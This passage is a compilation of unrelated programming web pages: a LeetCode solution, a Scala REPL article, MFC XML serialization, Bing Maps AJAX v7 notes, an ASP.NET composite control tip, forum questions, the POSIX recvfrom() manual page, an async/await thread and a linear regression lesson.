    int ans = numWaterBottles(numBottles, numExchange);
    cout << ans << endl;
    return 0;
}
19
Java code for Water Bottles
public class Tutorialcup {
    public static int numWaterBottles(int numBottles, int numExchange) {
        int ans = numBottles + (numBottles) / (numExchange - 1);
        if ((numBottles) % (numExchange - 1) == 0)
            ans--;
        return ans;
    }

    public static void main(String[] args) {
        int numBottles = 15, numExchange = 4;
        int ans = numWaterBottles(numBottles, numExchange);
        System.out.println(ans);
    }
}
19
Complexity Analysis of Water Bottles Leetcode Solution
Time complexity
The time complexity of the above code is O(1).
Space complexity
The space complexity of the above code is O(1) because we use only a single variable to store the answer.
Source: https://www.tutorialcup.com/leetcode-solutions/water-bottles-leetcode-solution.htm
Using the Scala REPL as a makeshift Java REPL
As you might already know, REPL stands for Read Evaluate Print Loop. It’s a way to try out things in a computer programming language on the command line and see immediate results.
You might also already know that Java is a programming language for the Java Virtual Machine (JVM), which can theoretically run on any computer, and that Scala is also a programming language for the JVM.
And that for a long time, Java did not really have a REPL, but Scala did, almost from its very beginning in 2006. And you can use the Scala REPL to run subroutines you’ve written in Java.
I know that there have been Java REPLs online for years. I have used one of them a few times, and another one once or twice. I am also aware of JShell, which was introduced with Java 9 (for now I lag behind with Java 8).
If you don’t feel like upgrading to Java 9 just yet (there are still legitimate reasons for that feeling), you can just use the Scala REPL.
Since Scala has access to pretty much everything in java.lang, the Scala REPL would be a bona fide Java REPL if it weren’t that you have to use Scala syntax rather than Java syntax. And you can load in a JAR that was compiled from Java source code and then you have access to anything that was declared public therein. To my knowledge, no online Java REPL can do that.
Using the Scala REPL as a makeshift Java REPL might seem like the sort of solution that I should e-mail to 2008, when people would have cared about it.
However, using the Scala REPL for Java might actually be superior to JShell in some ways. For one thing, overloaded operators can be a major convenience.
As I learn more about Scala, the Scala REPL will become even more useful to me as a Java REPL.
Before I get to that, though, I should address why anyone who uses a unit testing framework like JUnit would have any need or want for a REPL.
After all, the reason I started using JUnit in the first place was because I realized that the very primitive and limited REPLs I had built into my biggest Java project at the time (a program that draws diagrams of prime numbers in imaginary quadratic integer rings) were inadequate for testing the various “moving parts” of the program.
With JUnit, I can write a test that checks, for example, my Legendre symbol implementation against a thousand pairs of prime numbers in a matter of seconds.
To run all the tests in my project should only take a minute, two at the most. That would take forever on a REPL, or even on a primitive test suite without assertions.
The thing, though, is: how do I know what needs to be tested and how to test it? One way is by trying things on a REPL.
I might not be able to test a thousand pairs of prime numbers at a REPL in a reasonable amount of time if I have to input them one at a time, but I can think of specific pairs of prime numbers that might be troublesome for my program but which I didn’t think to test for when writing my unit tests.
On the REPL, I can try one specific case of a given scenario, and if I see it doesn’t give me the result I expect, I write a test for several cases of that given scenario, have that test fail and then I get to work on fixing the program so it passes the test.
Take for instance the Euclidean greatest common divisor (GCD) algorithm. In the domain of Z, the familiar integers we all know so well, …, −3, −2, −1, 0, 1, 2, 3, …, it is easy to know what to test for in an implementation of the Euclidean GCD.
As usual, I’m not going to get too in depth on the math here. If you’re curious about the mathematical aspect of it, you should be able to find more information in elementary number theory books, on Wolfram MathWorld and in the OEIS.
So, to test an implementation of the Euclidean GCD in Z, you’ll want to test that pairs of consecutive integers have a GCD of 1, and the same goes for pairs of consecutive odd integers.
Pairs of consecutive Fibonacci numbers (e.g., 21 and 34, 34 and 55) should also be identified as coprime. Pairs of consecutive even integers should have a GCD of 2.
If your GCD implementation gives results different than these, then you know your implementation has a problem. Here’s one unit test I would write:
@Test
public void testEuclideanGCDWithFibonacciNumbers() {
    int fibo1 = 0;
    int fibo2 = 1;
    int fiboSum;
    while (fibo2 < Integer.MAX_VALUE/8) {
        fiboSum = fibo1 + fibo2;
        fibo1 = fibo2;
        fibo2 = fiboSum;
        assertEquals(1, euclideanGCD(fibo1, fibo2));
    }
}
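The same sanity checks don't require a test framework at all. Here is a quick JavaScript sketch (my illustration, unrelated to the article's quadratic-integer code) of the ordinary Euclidean algorithm over Z, verifying the Fibonacci property just described:

```javascript
// Ordinary Euclidean GCD over the plain integers.
function gcd(a, b) {
  a = Math.abs(a);
  b = Math.abs(b);
  while (b !== 0) {
    [a, b] = [b, a % b];
  }
  return a;
}

// Consecutive Fibonacci numbers should always be coprime.
let fibo1 = 0, fibo2 = 1;
for (let i = 0; i < 40; i++) {
  const fiboSum = fibo1 + fibo2;
  fibo1 = fibo2;
  fibo2 = fiboSum;
  if (gcd(fibo1, fibo2) !== 1) {
    throw new Error(fibo1 + " and " + fibo2 + " should be coprime");
  }
}
```

Consecutive integers and consecutive odd integers can be checked the same way, and pairs of consecutive even integers should come back with a GCD of 2.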
How do I test that euclideanGCD(a, b) works correctly in, say, Z[i]? Or how about Z[√−2]?
The only things I was sure about at the beginning were that euclideanGCD(a, b) should throw an exception if a and b are from different domains, and another exception if both a and b are from the same non-Euclidean domain, like the famous Z[√−5].
I can certainly write tests for exceptions, whether with annotations or with a good old-fashioned try-fail-catch.
But to figure out tests for the normal functioning of euclideanGCD(a, b) with a and b both integers from the same Euclidean imaginary quadratic ring, I needed a REPL in which to try out different kinds of pairs.
And so it was thanks to the Scala REPL that I discovered that my implementation of the Euclidean GCD algorithm seemed to give the right result for gcd(−3/2 + (√−7)/2, 8) but would crash when asked to compute gcd(−3/2 + (√−7)/2, 10).
The latter computation would cause an ArrayIndexOutOfBoundsException, which led me to find that I had made a mistake with the checking of norms when a is not divisible by b.
This contradicted my early hunch that a mistake of that sort would cause a NullPointerException. I think at one point I actually wrote a unit test that expected a NullPointerException to happen, not an ArrayIndexOutOfBoundsException.
Maybe I still would have eventually discovered that problem without the help of a REPL. But with the REPL, it’s much easier to ask “What about this other case?”
I have to confess that I was and still am confused about how to actually install the Scala REPL on your system, even though it’s obviously something I have done on my system.
I had IntelliJ download the Scala plug-in, but, as far as I can tell, that does not include the Scala REPL. Next I downloaded LLVM/Clang, but still, no Scala REPL.
If I remember correctly, what I finally did to get the Scala REPL was to go to the Scala downloads page, scroll down to “Other ways to install Scala” and click the “Download the Scala binaries for Windows” link.
I did take a look at Ammonite, which is said to be “a popular Scala REPL,” but I have not installed it, much less used it.
Okay, now we can get to the nuts and bolts of actually using the Scala REPL as a Java REPL.
Once you have the Scala REPL on your system and adjust your operating system’s environment path variable, you can run the Scala REPL from the command line with the command scala. If you don’t feel like adding it to your system’s path, you’ll have to navigate to the scala\bin directory before you can start the REPL.
The most straightforward way to load your Java project into the Scala REPL is with the JAR file at the command line. Let’s say the Scala REPL is in your path variable and you have navigated to the folder with the JAR.
On NetBeans, the JAR folder path might be something like NetBeans Projects\MyProgram\dist\MyProgram.jar. On IntelliJ, it might be more like IDEA Projects\MyProgram\out\artifacts\myprogram_jar\MyProgram.jar. I don’t know about Eclipse.
Then you type in something like scala -cp MyProgram.jar. Give the JVM a second or two to start up. You should see something like this:
Welcome to Scala 2.12.6 (Java HotSpot(TM) 64-Bit Server VM, Java 1.8.0_161).
Type in expressions for evaluation. Or try :help.
First I’d try something very simple, just to make sure everything’s in working order.
scala> 1 + 1
res0: Int = 2
Next, to remind myself that this is Scala, not Java:
scala> 3.getClass
res1: Class[Int] = int
That res0 and res1 stuff is so that you can access previous results. You can do something like res0 + 1, for example.
Maybe there’s a better way, but as far as I can tell, to access the classes you loaded with the JAR file, you need to qualify the class names with the relevant package names, e.g., mainpackage.MainClass to access MainClass in mainpackage.
In my case, I loaded a very recent version of my ImaginaryQuadraticInteger project (available from my GitHub repository). That one consists of two packages: imaginaryquadraticinteger (which contains almost all the code) and filefilters. Maybe the project needs to be broken up into smaller packages, but that’s a discussion for another day.
So, to create a new ring object, just new ImaginaryQuadraticRing won’t do.
scala> val ringZi2 = new imaginaryquadraticinteger.ImaginaryQuadraticRing(-2)
ringZi2: imaginaryquadraticinteger.ImaginaryQuadraticRing = Z[?-2]
Uh oh. The square root character was changed to a question mark. It seems that all the console fonts on my system are strictly limited to ASCII.
Well, both ImaginaryQuadraticRing and ImaginaryQuadraticInteger have toASCIIString() functions. Hmm… maybe I could create Scala classes that extend those two classes for the sole purpose of rerouting toString() to toASCIIString().
But if I’m going to do that, I might as well overload the basic arithmetic operators. Like, for example, the plus operator for ImaginaryQuadraticInteger, which I put in the Scala class I’ve named ImagQuadInt:
def +(summand: ImagQuadInt): ImagQuadInt = {
val temp = this.plus(summand)
new ImagQuadInt(temp.realPartMult, temp.imagPartMult,
temp.imagQuadRing, temp.denominator)
}
In most Scala operator overload examples, you’ll see that or other used to refer to the second operand. Neither of those is a reserved Scala keyword, so I prefer to use a more meaningful word, “summand” in this case.
If you want to see the subtraction, multiplication and division overloads, they’re all in the GitHub repository I linked earlier.
So now in the Scala REPL I can do stuff like this:
scala> var numberC = numberA * numberB
numberC: imaginaryquadraticinteger.ImagQuadInt = 5 + sqrt(-2)
Obviously numberC can’t be prime. I wrote a function to make that determination in the NumberTheoreticFunctionsCalculator class of the imaginaryquadraticinteger package. At this point I’m really wishing I had given that one a shorter name, like maybe NTFC.
scala> imaginaryquadraticinteger.NumberTheoreticFunctionsCalculator.isPrime(numberC)
res7: Boolean = false
Some of you might be thinking “big deal, so what, Wolfram Alpha can do that.” Yeah, as long as you don’t ask that question about a prime number like 1 + √−2.
Mathematica wouldn’t be able to make that determination either, not unless you programmed it for that, or if they add that capability in a future version.
Lastly, I’d like to leave you with an example of something that feels almost ridiculous in a REPL: throwing and catching exceptions.
scala> try { numberC/numberA } catch { case nde: imaginaryquadraticinteger.NotDivisibleException => notDivExc = nde }
res42: Any = ()

scala> notDivExc
res43: imaginaryquadraticinteger.NotDivisibleException = imaginaryquadraticinteger.NotDivisibleException: -16 + 19sqrt(-2) is not divisible by 4 + 2sqrt(-2).

scala> notDivExc.roundTowardsZero
res45: imaginaryquadraticinteger.ImaginaryQuadraticInteger = 4?(-2)

scala> notDivExc.getBoundingIntegers
res46: Array[imaginaryquadraticinteger.ImaginaryQuadraticInteger] = Array(4?(-2), 1 + 4?(-2), 5?(-2), 1 + 5?(-2))
I hope this gives you a taste of what can be done in the Scala REPL.
Source: https://alonso-delarte.medium.com/using-the-scala-repl-as-a-makeshift-java-repl-a0004d2fcdb7
Serializing Your Structs Using XML
Introduction
This article shows how to save a struct into an XML file (using STL), and load it back using Microsoft's MSXML 3.0 parser. If you have Microsoft's MSXML 4.0 parser installed, modify the stdafx.h file to use MSXML4 instead of MSXML3. This code can be modified to use a class instead of a struct.
Using the Code
To implement this code in your project, initialize OLE support by inserting a call to ::AfxOleInit in the application class' InitInstance function. In my demo, this class is called CSerializeApp.
BOOL CSerializeApp::InitInstance()
{
    AfxEnableControlContainer();
    . . .
    ::AfxOleInit();

    // Because the dialog has been closed, return FALSE so
    // that we exit the application, rather than start the
    // application's message pump.
    return FALSE;
}
#import <msxml3.dll> named_guids
using namespace MSXML2;
Replace the 3 in msxml3.dll above with 4 if you have Microsoft's MSXML 4.0 parser installed. In addition, add the following to the stdafx.h file, right before the #import above:
#include <atlbase.h> // Needed for CComVariant.
Add the files SerializeXML.cpp/h to your project and modify the structs and function names to suit your needs. Finally, call the save/load functions you added to save/load your structures to XML files. In my demo application, I call everything from BOOL CSerializeDlg::OnInitDialog(), just to test it out.
Points of Interest
Introduction to Using the XML DOM from Visual C++ by Tom Archer.
Downloads
Download demo project - 15 Kb
Download source - 3 Kb
NEVER place 'using namespace ...' in a header!!!
Posted by Legacy on 05/08/2003 12:00am
Originally posted by: Jeff Flinn
NEVER, NEVER, NEVER place 'using namespace ...' in a header!!!
Source: http://www.codeguru.com/cpp/data/data-misc/xml/article.php/c4559/Serializing-Your-Structs-Using-XML.htm
We updated the Bing Maps AJAX Control v7 a week ago with some new features. Check out the official announcement on the Bing Maps Blog if you missed it. Here are some details for developers on the new features in this update:
- New Bing Maps AJAX Control 7.0 interactive SDK which shows interactive samples of how to use the different features of the Bing Maps AJAX Control v7. The interactive SDK has code samples you can run and see the source code for and makes it very easy to try out APIs and build applications with the v7 control.
- New inertia feature which animates the map when panning the map. This provides a nice effect especially on touch devices where you can flick the map. The useInertia and inertiaIntensity properties were added to the MapOptions. By default useInertia is set to true and the inertiaIntensity option is set to 0.85. You can adjust these properties to turn off or customize the inertia effect.
- New backgroundColor property was added to the MapOptions. This allows you to modify the color behind the map imagery.
- New tileBuffer property was added to the MapOptions which allows you to customize how many buffer tiles appear outside the map view. By default it is set to 0. This option specifies the number of buffer tile rows to load outside the map control view boundary. This setting allows you to customize the map experience for more visual smoothness when panning.
- New fixedMapPosition property was added to the MapOptions. This setting by default is false. Setting this to true can improve performance of the map control when you position the map control in a div that will not be resized or moved on the page. This primarily is for mobile web applications that may have a fixed screen size or a browser that will not resize the page.
- New dynamic module loading support for the creation of modules to add on to the v7 control. The loadModule, registerModule, and moduleLoaded methods have been added to the Microsoft.Maps namespace for module registration and loading. See the Module Loading methods topic in the MSDN documentation for more details.
- New GeoLocationProvider class was added with geolocation methods that make it easier to detect and display a user’s location on the map. This feature leverages the W3C Geolocation API specification and is supported on browsers that have support for it.
- New asynchronous loading support, for better performance on web pages that load content in parallel. If you want to load the map control asynchronously alongside other items on your page, use the onscriptload parameter on the map control handler. See the Setting Map Control Parameters topic on MSDN for more details.
For more details on using the Bing Maps AJAX Control v7, see the AJAX v7 interactive SDK or Ajax v7 SDK documentation.
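As an illustration of how several of these options fit together, a map options literal might look like the following. This is a hypothetical sketch: the credentials value is a placeholder, and the commented-out constructor call assumes the v7 script is loaded on the page.

```javascript
// Hypothetical MapOptions combining the new v7 settings described above.
const mapOptions = {
  credentials: "YOUR_BING_MAPS_KEY", // placeholder application key
  useInertia: true,                  // animated panning (default: true)
  inertiaIntensity: 0.85,            // default intensity
  tileBuffer: 1,                     // one extra row of tiles outside the view
  fixedMapPosition: false            // set true only for fixed-size mobile layouts
};

// With the v7 control loaded on the page, the options would be passed in as:
// var map = new Microsoft.Maps.Map(document.getElementById("mapDiv"), mapOptions);
```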
It would have saved us a lot of time and effort if Microsoft had changed the version from 7.0 to 7.0.1 or something similar. This update cost us a lot of money and time on a project that was almost complete at the time of the update.
Please talk to the Bing Team and encourage them to improve this Update process! They almost destroyed our company with their Update. We're a 2 man consulting team and this project was our big money maker. We rolled the dice with Bing Ajax 7 and almost lost all of our Profit on this project.
Thanks Harry for the feedback. We are sorry this update inadvertently affected some customers when we switched to support asynchronous loading for improved performance. It was not our intention to introduce breaking changes to the v7 API. Ultimately we corrected this issue shortly after this update. We are working hard to ensure that future updates do not break existing APIs.
Source: https://blogs.msdn.microsoft.com/keithkin/2011/05/16/update-to-bing-maps-ajax-control-v7/?replytocom=1413
ASP.NET Tip: Creating a Composite Web Control
Adding user controls to a web application is a fairly easy thing to do. You essentially create a portion of a web page, add your HTML, and then use the control within your application. Although easy to create, user controls are harder to share between projects. As an alternative to user controls, you can create a new web control in a separate library. This type of control—a composite control—is harder to create but much easier to share between applications. This tip demonstrates how to create a relatively simple composite control.
A composite control is one made up of other built-in controls, such as text boxes. You also can create a control from scratch if you don't want to use the built-in controls. This example, however, puts three text boxes together to allow a user to enter a date. It'll have a little bit of logic to combine the values of the boxes into a single date.
To build the example application, you need two projects: a Web Control Library project and a web site project. When you're building a web control, you house a control within a class file. In this case, the DateEditBox control class, which just shows three text boxes on the screen, is shown here:
namespace MyControls
{
    [DefaultProperty("Value")]
    [ToolboxData("<{0}:DateEditBox runat=server></{0}:DateEditBox>")]
    public class DateEditBox : CompositeControl
    {
        private TextBox txtMonth = new TextBox();
        private TextBox txtDay = new TextBox();
        private TextBox txtYear = new TextBox();

        protected override void OnInit(EventArgs e)
        {
            base.OnInit(e);
            txtMonth.ID = this.ID + "_month";
            txtMonth.MaxLength = 2;
            txtMonth.Width = this.Width;
            txtDay.ID = this.ID + "_day";
            txtDay.MaxLength = 2;
            txtDay.Width = this.Width;
            txtYear.ID = this.ID + "_year";
            txtYear.MaxLength = 4;
            txtYear.Width = this.Width;
        }

        [Bindable(true)]
        [Category("Appearance")]
        [DefaultValue("")]
        [Localizable(true)]
        public DateTime Value
        {
            get
            {
                EnsureChildControls();
                if (txtMonth.Text == "" || txtDay.Text == "" || txtYear.Text == "")
                    return DateTime.MinValue;
                else
                    return new DateTime(Convert.ToInt32(txtYear.Text),
                                        Convert.ToInt32(txtMonth.Text),
                                        Convert.ToInt32(txtDay.Text));
            }
            set
            {
                EnsureChildControls();
                txtMonth.Text = value.Month.ToString();
                txtDay.Text = value.Day.ToString();
                txtYear.Text = value.Year.ToString();
            }
        }

        protected override void CreateChildControls()
        {
            this.Controls.Add(txtMonth);
            this.Controls.Add(txtDay);
            this.Controls.Add(txtYear);
            base.CreateChildControls();
        }

        public override void RenderControl(HtmlTextWriter writer)
        {
            writer.RenderBeginTag(HtmlTextWriterTag.Table);
            writer.RenderBeginTag(HtmlTextWriterTag.Tr);
            writer.RenderBeginTag(HtmlTextWriterTag.Td);
            txtMonth.RenderControl(writer);
            writer.RenderEndTag(); // td
            writer.RenderBeginTag(HtmlTextWriterTag.Td);
            writer.Write("/");
            writer.RenderEndTag(); // td
            writer.RenderBeginTag(HtmlTextWriterTag.Td);
            txtDay.RenderControl(writer);
            writer.RenderEndTag(); // td
            writer.RenderBeginTag(HtmlTextWriterTag.Td);
            writer.Write("/");
            writer.RenderEndTag(); // td
            writer.RenderBeginTag(HtmlTextWriterTag.Td);
            txtYear.RenderControl(writer);
            writer.RenderEndTag(); // td
            writer.RenderEndTag(); // tr
            writer.RenderEndTag(); // table
        }
    }
}
There's a lot going on in this class. To begin with, the declaration of the class includes a couple of attributes required to make the control work on the web page. The first is the default value, which is specified as your Value property. The second is the format used when someone wants to add the control to a web page, typically by dragging the control from the Visual Studio toolbox. You also should note that this class derives from CompositeControl, which is a class designed specifically for controls that use only built-in controls. See the help for more details on what this base class includes.
In the OnInit event, we set some attributes on the child controls: txtMonth, txtDay, and txtYear. The Width property is copied from the parent control to the child controls, which lets these controls use attributes specified on the parent control. You also could add extra properties to the class to control each child control if you wanted to. You also set the ID properties of each child control to be prefixed by the ID assigned to the parent control. This lets you access the child controls later.
You then have your Value property, used to set and read the value of the composite control. As part of your basic validation, send back the date only if all three boxes are filled in. You could also add extra validation here to make sure that the fields are numeric. The set portion of the property breaks the specified date into three parts to fill each of the three boxes.
Now, you have the CreateChildControls method, followed by the RenderControl method. The CreateChildControls is responsible strictly for getting the controls into the page for postback use. If you leave out this method, your child controls won't have the ability to maintain viewstate. The RenderControl method is responsible for showing the web control on the web page. In this case, you show the three textboxes in a table like this:
<table>
  <tr>
    <td>[txtMonth]</td>
    <td>/</td>
    <td>[txtDay]</td>
    <td>/</td>
    <td>[txtYear]</td>
  </tr>
</table>
The HtmlTextWriter control includes methods to properly add and close table cells, as well as all the other defined HTML tags. This method takes care of displaying your control on the web page. To use this control in a separate web page, you need to reference your project and then, on the page where you want to use it, add this directive:
<%@ Register Assembly="MyControls" Namespace="MyControls" TagPrefix="MC" %>
Once that reference is in place and the web project has a copy of the MyControls DLL, you'll get the IntelliSense to add MC:DateEditBox as a control. From your code-behind, you can look at the control's Value property and set the Width to control the width of each box that makes up the control.
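Putting the pieces together, the consuming page might look like this (a sketch; the ID and Width values here are illustrative, not from the article):

```aspx
<%@ Register Assembly="MyControls" Namespace="MyControls" TagPrefix="MC" %>
<MC:DateEditBox ID="BirthDate" runat="server" Width="40px" />
```

The code-behind can then read `BirthDate.Value` to get the combined `DateTime`, or assign a `DateTime` to it to populate all three boxes.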
Covering the Basics
There are lots of other features you could add, but this tip showed you just the basics required of every composite control: creating the child controls, setting the ID properties, adding them to the Controls collection, and then rendering the control. After that, you can add any extra properties, methods, or events to make the control an even more valuable part of your web toolbox.
compiling/debugging the Composite Web Control (posted by PatBad on 02/22/2007 12:27pm)
Hi, I have a similar project like this one. When I compile the DLL with vbc I can reference the DLL in the Visual Studio web solution project and it works! If instead I compile the DLL as a Web Control Library (same source code file both times) I get the "Unknown server tag" error. Any idea?
https://www.codeguru.com/csharp/.net/net_asp/webforms/article.php/c12725/ASPNET-Tip-Creating-a-Composite-Web-Control.htm
Type: Posts; User: mot1639
HI all ,
I made a simple electronic module which connects to a modem and sends data to a server application made in VB6. Now when huge data comes, I can't receive the data from my module, but with...
Hi all ,
Now for 5 days I have been trying to forward or resend an SMS from the index... but I can't, using AT commands.
The problem is that I receive a multipart SMS (a long SMS via my Nokia 6230 phone), but...
hi all
this is my code
#include <iostream>
#include <fstream>
using namespace std;
hi all ,
I have a DataGridView connected to an Access database. My question is: how can I delete a specific row, when I click on it, from both the DataGridView and the database?
this is a data grid ...
...
any Help her ??
no it is not a homework ,,,,, ????!!! i already build a application between the GUI and the access database ... the only question how to insert the a barcode in the access and print it ?
hi all ,
i have barcodex ... also i have OLE Object filed in my access ..
how i can save this barcode in the access also how i can print the barcode ???
regards for all and i will...
hi
i write this code but i phase a problem :::
her the code
#include<iostream.h>
#include<conio.h>
int main()
hi all
I need support to find specific data in a sentence; the data has a fixed length, which is 9.
for example i have sentence
test 888508432199 this is test
now to take...
there no one know a soulation ???
regards
hi all
i write this code and it work fine to split the text to equal part
but the problem is that ....
for example, I need to see a MsgBox with only a max of 45 characters; there's no problem...
sorry for that
the error is her (((((( secondList = first;)))))
void linkedListType<Type>::splitAt(linkedListType &secondList,
const Type& item)
{...
hi all,
Suppose myList points to a list with the elements 34 65 27 89 12 (in this order). The statement
myList.splitMid(sublist);
splits myList into two sublists: myList points to the list with...
what i need is that
For fI1 = 1 To 31
If xlsheet1.Cells(fI1, 1) = "" Then
xl.ActiveWorkbook.Close False, CStr(App.Path & "\12.xls")
Else
cl...
Option Explicit
Dim xl As New Excel.Application
Dim xlsheet As Excel.Worksheet
Dim xlsheet1 As Excel.Worksheet
Dim xlwbook As Excel.Workbook
Private Sub Command1_Click()
Dim fI As Integer...
thanks , yes i write the code in VB6, can you help me how to start ??
regards
hi,
i try so hard to solve this problem but i still face problem
Now I Have Excel Sheet which contain /28/30/31 row depend on MOnth, some month have 30 day or other 31 day or 28 day.
My...
http://forums.codeguru.com/search.php?s=c8469ea48325421d27528ebf171d2f6e&searchid=965465
I'm setting up a finite state machine structure as a proof of concept to be used in other projects. The states have function pointers that point to actions they are allowed to perform during certain events and transitions. I'm trying to restrict these pointers to be a part of a certain namespace, but the compiler doesn't recognize the namespace. The exact error is "'StateAction': is not a class or namespace name". I've whittled out code until just these lines below remain.
// In State.h file
#pragma once
#include "StateAction.h"

class CState {
public:
    void addAction(void (StateAction::*funcPtr)()) { m_func = funcPtr; }  // error line
private:
    void (StateAction::*m_func)();  // error line
};

// In StateAction.h file
#pragma once
#include <iostream>

namespace StateAction {
    void fun1();
    void fun2();
};

// In StateAction.cpp file
#include "StateAction.h"

void StateAction::fun1() { std::cout << "func 1" << std::endl; }
void StateAction::fun2() { std::cout << "func 2" << std::endl; }
Any suggestions are appreciated. Most searches on this error are about circular dependencies, so I haven't been able to find much info. Is it even possible to restrict a function pointer to a namespace? I'm almost positive I've done this before with classes.
https://www.daniweb.com/programming/software-development/threads/444855/namespace-function-pointers-not-a-namespace-name-error
recvfrom - receive a message from a socket
#include <sys/socket.h>
ssize_t recvfrom(int socket, void *restrict buffer, size_t length,
int flags, struct sockaddr *restrict address,
socklen_t *restrict address_len);
The recvfrom() function shall receive a message from a connection-mode or connectionless-mode socket. It is normally used with connectionless-mode sockets because it permits the application to retrieve the source address of received data. The address_len argument is:
- Either a null pointer, if address is a null pointer, or a pointer to a socklen_t object which on input specifies the length of the supplied sockaddr structure, and on output specifies the length of the stored address.
The recvfrom() function shall return the length of the message written to the buffer pointed to by the buffer argument. For message-based sockets, such as SOCK_RAW, SOCK_DGRAM, and SOCK_SEQPACKET, the entire message shall be read in a single operation.
Upon successful completion, recvfrom() shall return the length of the message in bytes. If no messages are available to be received and the peer has performed an orderly shutdown, recvfrom() shall return 0. Otherwise, the function shall return -1 and set errno to indicate the error.
See also: poll(), pselect(), read(), recv(), recvmsg(), send(), sendmsg(), sendto(), shutdown(), socket(), write()
XBD <sys/socket.h>
First released in Issue 6. Derived from the XNS, Issue 5.2 specification.
POSIX.1-2008, Technical Corrigendum 1, XSH/TC1-2008/0503 [464] is applied.
https://pubs.opengroup.org/onlinepubs/9699919799/functions/recvfrom.html
Posted by kmcnet (Member, 303 Points) on Dec 17, 2018 10:53 PM
Hello everyone and thanks for the help in advance. I am trying to use an example from a Twilio tutorial. I am having a problem with the code:
The line await DownloadUrlToFileAsync(mediaUrl, filePath); generates an error "The 'await' operator can only be used within an async method. Consider marking this method with the 'async' modifier and changing its return type to 'Task<ActionResult>'. The await function looks like:
private static async Task DownloadUrlToFileAsync(string mediaUrl, string filePath)
{
    using (var client = new HttpClient())
    {
        var response = await client.GetAsync(mediaUrl);
        var httpStream = await response.Content.ReadAsStreamAsync();
        using (var fileStream = System.IO.File.Create(filePath))
        {
            await httpStream.CopyToAsync(fileStream);
            await fileStream.FlushAsync();
        }
    }
}
copied straight from the Twilio example. I really don't have much experience using the Await function, so I'm not sure how to handle this. Any help would be appreciated.
"
Posted by mgebhard (All-Star, 39341 Points) on Dec 17, 2018 11:45 PM
The method that has the for loop needs an async too. The link illustrates this...
public class MmsController : TwilioController
{
    private const string SavePath = "~/App_Data/";

    [HttpPost]
    public async Task<TwiMLResult> Index(SmsRequest request, int numMedia)
    {
        // ... (media-saving loop elided)
        var response = new MessagingResponse();
        var body = numMedia == 0
            ? "Send us an image!"
            : $"Thanks for sending us {numMedia} file(s)!";
        response.Message(body);
        return TwiML(response);
    }
}
Is your code from a Web Forms application? Can you share your code?
Posted by rubaiyat2009@gmail.com (Member, 710 Points) on Dec 18, 2018 02:21 AM
Hi kmcnet,
Your declaration of the Task is not in the proper format. It should be in the form Task<string> DownloadUrlToFileAsync(...). Also, you can only use await inside an async method, so the method that calls DownloadUrlToFileAsync must itself be marked async. Otherwise you'll have to use your own async-compatible context, call Wait on the returned Task in the Main method, or just ignore the returned Task and block on the call to Read. Note that Wait will wrap any exceptions in an AggregateException.
For more info you can see Async and Await
Pls don't forget to mark as answer, when my suggestion helps you. Thanks
Posted by kmcnet (Member, 303 Points) on Dec 18, 2018 03:07 AM
Thanks for the response. That took care of it. The application is MVC using controllers as endpoints. I'm following the example pretty closely, but will be more than happy to post the working code. I do have some other questions that I'm sure you can help with. Let me get it working and I'll post the code sometime tomorrow.
https://forums.asp.net/t/2150498.aspx?Problems+with+Await
Now we know a bit about plotting data and we have written some functions, like
trace_values,
layout, and
plot, to help us do so. You can view them here.
Imagine we are hired as a consultant for a movie executive. The movie executive receives a budget proposal, and wants to know how much money the movie might make. We can help him by building a model of the relationship between the money spent on a movie and money made.
To predict movie revenue based on a budget, let's draw a single straight line that represents the relationship between how much a movie costs and how much it makes.
Eventually, we will want to train this model to match up against an actual data, but for now let's just draw a line to see how it can make estimates.
from lib.graph import trace_values, plot, layout

regression_trace = trace_values([0, 150], [0, 450], mode = 'lines', name = 'estimated revenue')
movie_layout = layout(options = {'title': 'Movie Spending and Revenue (in millions)'})
plot([regression_trace], movie_layout)
By using a line, we can see how much money is earned for any point on this line. All we need to do is look at a given $x$ value, and find the corresponding $y$ value at that point on the line.
This approach of modeling a linear relationship (that is, drawing a straight line) between an input and an output is called linear regression. We call the input our explanatory variable, and the output the dependent variable. So here, we are saying budget explains our dependent variable, revenue.
Instead of only representing this line visually, we also would like to represent this line with a function. That way, instead of having to see how an $x$ value points to a $y$ value along our line, we simply could punch this input into our function to calculate the proper output.
Let's take an initial (wrong) guess at turning this line into a function.
First, we represent the line as a mathematical formula.
$y = x$
Then, we turn this formula into a function:
def y(x):
    return x

y(0)
y(10000000)
This is pretty nice. We just wrote a function that automatically calculates the expected revenue given a certain movie budget. This function says that for every value of $x$ that we input to the function, we get back an equal value $y$. So according to the function, if the movie has a budget of $30$ million, it will earn $30$ million.
Take a look at the line that we drew. Our line says something different. The line says that spending 30 million brings predicted earnings of 90 million. We need to change our function so that it matches our line. In fact, we need a consistent way to turn lines into functions, and vice versa. Let's get to it.
We start by turning our line into a chart below. It shows how our line relates x-values and y-values, or our budgets and revenues.
Next, we need an equation that allows us to match this data.
What equation is that? Well it's $y = 3x$. Take a look to see for yourself.
Let's see it in the code. This is what it looks like:
def y(x): return 3*x
y(30000000)
y(0)
Progress! We multiplied each $x$ value by 3 so that our function's outputs correspond to the $y$ values appearing along our graphed line.
By multiplying $x$ by 3, we just altered the slope variable. The slope variable changes the inclination of the line in our graph. Slope generally is represented by $m$ like so:
$y = mx$
Let's make sure we understand what all of our variables stand for. Here they are:
- $y$: the output, or dependent variable
- $x$: the input, or explanatory variable
- $m$: the slope of the line
Let's adapt these terms to our movie example. The $y$ value is the revenue earned from the movie, which we say is in response to our budget. The explanatory variable $x$ represents our budget, and $m$ corresponds to our value of 3, which describes how much money is earned for each dollar spent. Therefore, with an $m$ of 3, our line says to expect to earn 3 dollars for each dollar spent making the movie. Likewise, an $m$ of 2 suggests we earn 2 dollars for every dollar we spend.
A higher value of $m$ means a steeper line. It also means that we expect more money earned per dollar spent on our movies. Imagine the line pivoting to a steeper tilt as we guess a higher amount of money earned per dollar spent.
There is one more thing that we need to learn in order to describe every straight line in a two-dimensional world. That is the y-intercept.
- The y-intercept is the $y$ value of the line where it intersects the y-axis.
- Or, put another way, the y-intercept is the value of $y$ when $x$ equals zero.
Let's add a trace with a higher y-intercept than our initial line to the movie plot.
regression_trace_increased = trace_values([0, 150], [50, 500], mode = 'lines', name = 'increased est. revenue')
plot([regression_trace_increased, regression_trace], movie_layout)
What is the y-intercept of the original estimated revenue line? Well, it's the value of $y$ when that line crosses the y-axis. That value is zero. Our second line is parallel to the first but is shifted higher so that the y-intercept increases up to 50 million. Here, for every value of $x$, the corresponding value of $y$ is higher by 50 million.
In addition to determining the y-intercept from a line on a graph, we can also see the y-intercept by looking at a chart of points.
